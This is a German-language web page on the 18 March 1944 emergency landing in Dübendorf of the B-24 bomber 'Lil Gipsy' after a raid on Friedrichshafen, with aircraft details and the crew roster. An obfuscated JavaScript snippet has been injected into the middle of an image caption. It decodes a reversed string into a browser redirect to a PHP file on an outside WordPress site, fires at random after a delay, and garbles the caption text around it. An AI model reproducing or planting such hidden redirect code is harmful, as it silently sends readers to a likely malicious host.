Ereignisse

Kein Oeldruck mehr

Der Bomber mit dem Kennzeichen G und dem Übernamen „Lil Gipsy“ ist nach einem Einsatz über Friedrichshafen in Dübendorf gelandet und in der Schweiz verschrottet worden.

Die "Lill Gypsy" von William A. Kala nach der L<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andung in Dübendorf. (133_2)“ width=“800″ height=“221″ /> Die „Lill Gypsy“ von William A. Kala nach der Landung in Dübendorf. (133_2)

Der Bomber der 8th Air Force, 392nd Bomb Group mit dem Kennzeichen G und dem Übernamen „Lil Gipsy“ ist nach einem Einsatz über Friedrichshafen in Dübendorf gelandet und in der Schweiz verschrottet worden. 1Lt William A. Kala verliess die Formation nach dem Bombenabwurf, nachdem Motor 1 keinen Oeldruck mehr hatte und in Segelstellung gebracht werden musste.


Ereignissdatum 18.3.1944
Ort Dübendorf
Kanton ZH
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-24 Liberator
Flugzeugbezeichnung B-24 H-1-CF
Flugzeug-Spitzname Lil Gipsy
Einteilung 8th Air Force, 392nd Bomb Group, 579th Squadron
Basis Wendling (GB)
Auftrag Bombardierung
Einsatzziel Friedrichshafen (D)
Rückkehr in der Schweiz verschrottet
Werknummer 41-29127
Kennzeichen G
CH Archiv Nr. A024
US MACR Nr. 3617
Besatzung Pilot: William A. Kale, 1st Lt
Copilot: Nelson H. Willingham, 2nd Lt
Navigator: Walter A. Syroid, 2nd Lt
Bombardier: James G. White, 1st Lt
Engineer: Nedham Toler, S/Sgt
Asst. Engineer: Robert H. Hildebrand, S/Sgt
Radio: Ray Finley, T/Sgt
Asst. Radio: Voral J. Birch, S/Sgt
Gunner: Clyde E. Peacock, S/Sgt
Gunner: Milton L. Haaland, S/Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer